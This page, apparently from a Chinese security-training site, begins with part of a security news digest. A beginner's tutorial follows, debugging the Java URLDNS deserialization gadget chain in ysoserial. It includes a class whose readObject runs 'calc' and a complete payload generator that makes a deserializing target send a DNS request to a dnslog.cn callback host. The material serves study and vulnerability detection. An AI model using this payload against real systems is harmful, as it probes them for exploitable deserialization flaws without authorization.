https://thehackernews.com/2023/07/blog-post.html GitHub 上发现了一个概念验证 (PoC),其中隐藏了一个采用“狡猾”持久性方法的后门,该存储库伪装成CVE-2023-35829的 PoC ,这是最近披露的 Linux 内核中的一个高严重性缺陷。此后它已被下架,但在此之前它被fork了 25 次。
5、罗克韦尔自动化 ControlLogix 中的漏洞使工业系统面临远程攻击
https://thehackernews.com/2023/07/rockwell-automation-controllogix-bugs.html 美国网络安全和基础设施安全局 (CISA) 警告称,存在两个影响罗克韦尔自动化 ControlLogix EtherNet/IP (ENIP) 通信模块模型的安全缺陷,这些缺陷可被利用来实现远程代码执行和拒绝服务 (DoS)。
6、流行的 Ghostscript 开源 PDF 库中发现高危RCE漏洞
https://www.bleepingcomputer.com/news/security/critical-rce-found-in-popular-ghostscript-open-source-pdf-library/ Ghostscript 是 Linux 中广泛使用的 PostScript 语言和 PDF 文件的开源解释器,被发现容易受到严重远程代码执行漏洞的影响。该漏洞被追踪为 CVE-2023-36664,CVSS v3 评级为 9.8,影响 10.01.2 之前的所有 Ghostscript 版本。
7、APT29组织利用宝马汽车广告进行网络钓鱼攻击
https://unit42.paloaltonetworks.com/cloaked-ursa-phishing 研究人员发现,APT29组织使用宝马汽车广告针对乌克兰的外交官进行网络钓鱼攻击,此次攻击活动从2023年5月份开始进行。攻击者模仿合法的汽车出售广告,发送给目标外交官的电子邮箱中。当收件人点击恶意文档中的链接时,会被重定向至一个HTML页面,该页面通过HTML走私技术投递恶意ISO文件。恶意的ISO文件中包含9张伪装成图像的LNK文件,当受害者点击这些LNK文件后,便会启动一个合法的可执行程序,利用“白加黑”加载恶意DLL文件将Shellcode注入当前进程的内存中执行。
8、德意志银行确认其供应商泄露客户数据
https://www.bleepingcomputer.com/news/security/deutsche-bank-confirms-provider-breach-exposed-customer-data 德意志银行证实,其一家服务供应商泄露客户数据,并且这可能是一次受MOVEit Transfer漏洞影响的数据泄露事件。该银行表示,受到此次数据泄露影响的客户数量尚未确定,并正在调查数据泄露的原因。此外,该银行保证,其内部系统并没有受到此次事件的影响。为应对可能存在的风险,该行将未经授权的直接借记退货期延长至13个月,使其客户有充足的时间识别、报告未经授权的交易并获得报销。
9、研究人员发现新型Linux恶意软件PyLoose
https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads 研究人员发现一种名为PyLoose的新型恶意软件,该恶意软件以云工作负载为目标,劫持其计算资源从而进行门罗币挖矿活动。PyLoose是一个Python脚本,包含一个经过压缩及编码的XMRig挖矿程序。该脚本内容仅含有9行代码,执行后对XMRig进行解码及解压缩,然后通过内存文件描述符memfd将其直接加载至内存中执行。PyLoose于2023年6月22日被首次检测到,当天该脚本被上传至VisuaTotal,可能是攻击者在对
10、赎金高达 4.5 亿美元!2023 年上半年勒索总金额暴增64%
https://www.freebuf.com/news/371968.html 据区块链分析公司Chainaanalysis 的调查结果,勒索软件攻击已成为 2023 年唯一增长的基于加密货币的犯罪行为,网络犯罪分子的勒索金额比一年前增加了近 1.758 亿美元,达4.491 亿美元,增长率高达63.8%。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
Java反序列化:URLDNS的反序列化调试分析
URLDNS链子是Java反序列化分析的第0课,网上也有很多优质的分析文章。
笔者作为Java安全初学者,也从0到1调试了一遍,现在给出调试笔记。
一. Java反序列化前置知识
Java原生链序列化:利用Java.io.ObjectInputStream对象输出流的writerObject方法实现Serializable接口,将对象转化成字节序列。
Java原生链反序列化:利用Java.io.ObjectOutputStream对象输入流的readObject方法实现将字节序列转化成对象。
测试源码如下,此部分源码参考了ol4three师傅的博客:
package serialize;
import java.io.*;
public class deserTest implements Serializable {
private int n;
public deserTest(int n) {
this.n=n;
}
@Override
public String toString() {
return "deserTest2 [n=" + n + ", getClass()=" + getClass() + ", hashCode()=" + hashCode() + ", toString()="
+ super.toString() + "]";
}
// 反序列化
private void readObject(java.io.ObjectInputStream in) throws IOException,ClassNotFoundException{
in.defaultReadObject();
Runtime.getRuntime().exec("calc");
System.out.println("test");
}
public static void main(String[] args) {
deserTest x = new deserTest(5);
operation1.ser(x);
operation1.deser();
x.toString();
}
}
// 实现序列化和反序列化具体细节的类
class operation1{
// 将输出字节流写入文件中进行封存
public static void ser(Object obj) {
// 序列化操作,写操作
try {
// 首先文件落地object.obj存储输出流,绑定输出流
ObjectOutputStream ooStream = new ObjectOutputStream(new FileOutputStream("object.obj"));
// 重定向将输出流字节写入文件
ooStream.writeObject(obj);
ooStream.flush();
ooStream.close();
} catch (FileNotFoundException e) {
e.printStackTrace();
}catch (IOException e) {
// TODO: handle exception
e.printStackTrace();
}
}
public static void deser() {
// 反序列化,读取操作
try {
// 绑定输入流
ObjectInputStream iiStream = new ObjectInputStream(new FileInputStream("object.obj"));
// 反序列化时需要从相关的文件容器中读取输出的字节流
// 读取字节流操作为readObject,所以重写readObject可以执行自定义代码
Object xObject = iiStream.readObject();
iiStream.close();
} catch (IOException e) {
// TODO: handle exception
e.printStackTrace();
} catch (ClassNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
二. ysoserial环境搭建
IDE就直接用JetBrains的IDEA就行
直接拿Java安全payload集成化工具ysoserial进行分析,这里面已经有现成的环境了
https://github.com/frohoff/ysoserial注意配置好相应的JDK和SDK版本:
三. URLDNS攻击链
影响的版本问题:与JDK版本无关,其攻击链实现依赖于Java内置类,与第三方库无关
URLDNS这条反序列化链只能发起DNS请求,无法进行其他利用,可以作为验证是否有反序列化漏洞的姿势
调试分析
Gadget Chain:
Deserializer.deserialize() -> HashMap.readObject() -> HashMap.putVal() -> HashMap.hash() ->URL.hashCode() ->
getHostAddress()
在getHostAddress函数中进行域名解析,从而可以被DNSLog平台捕获
URLDNS程序入口
在ysoserial-master\src\main\java\ysoserial\payloads\URLDNS.java路径下有URLDNS.java文件
main主函数的run函数打断点进入
这个ysoserial-master的payload运行结构大致是有一个专门的PayloadRunner运行程序,然后统一调用来运行各部分的payload
首先是进行序列化:
继续往下,生成command,由于是分析URLDNS攻击链,所以只需要修改将返回值为dnslog的临时地址
创建实例后,进入到URLDNS的getObject的payload函数
getObject函数中应该注意的是:声明了HashMap对象和URL对象,并进行put哈希绑定,最后设置作用域
反序列化链子:
在反序列化入口处打断点:
在反序列化时调用了readObject函数
然后进入HashMap.java的readObject函数
在readObject中调试到此行,了putval,在此处IDEA这个IDE可以选择进入的函数,直接进入后者hash
由于我们读入字节序列,需要将其恢复成相应的对象结构,那么就需要重新putval
传入的key不为空,执行key.hashCode
进一步在URL.java文件下
进入URLStreamHandler的hashCode
产生解析:
总的来说,利用链思路如下:
在反序列化URLDNS对象时,也需要反序列化HashMap对象,从而调用了HashMap.readObject()的重写函数,重写函数中调用了哈希表putval等的相关重构函数,在hashcode下调用了getHostAddress函数
那么反之,为什么首次声明的时候没有调用到了getHostAddress函数,现在给出声明时的函数路线:
ht.put() --> .. --> SilentURLStreamHandler.getHostAddress()
该函数为空实现
列出几个路线上的关键函数看看:
由于此处key为String类型,则进入String.hashCode
相比之下,在反序列化中key为URL类型
设置了不发起dns解析
具体执行流,可以看下时序图,我就不讲了^^
四. URLDNS链的使用
import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
public class Main{
// 序列化前不发生dns解析
static class SilentURLStreamHandler extends URLStreamHandler{
protected URLConnection openConnection(URL n) throws IOException{
return null;
}
protected synchronized InetAddress getHostAddress(URL n)
{
return null;
}
}
public static void main(String[] args) throws Exception{
HashMap hashMap = new HashMap();
// 设置put时不发起dns解析
URLStreamHandler handler = new Main.SilentURLStreamHandler();
URL url = new URL(null, "http://jloqk8.dnslog.cn", handler);
// 利用Java反射机制在动态执行时获取类
Class clazz = Class.forName("java.net.URL");
Field f = clazz.getDeclaredField("hashCode");
f.setAccessible(true);
hashMap.put(url, "123");
f.set(url, -1);
// 对象输出流绑定文件输出流
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("out.bin"));
oos.writeObject(hashMap); // 序列化
// 对象输入流绑定文件输入流
ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin"));
ois.readObject(); // 反序列化
}
}
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

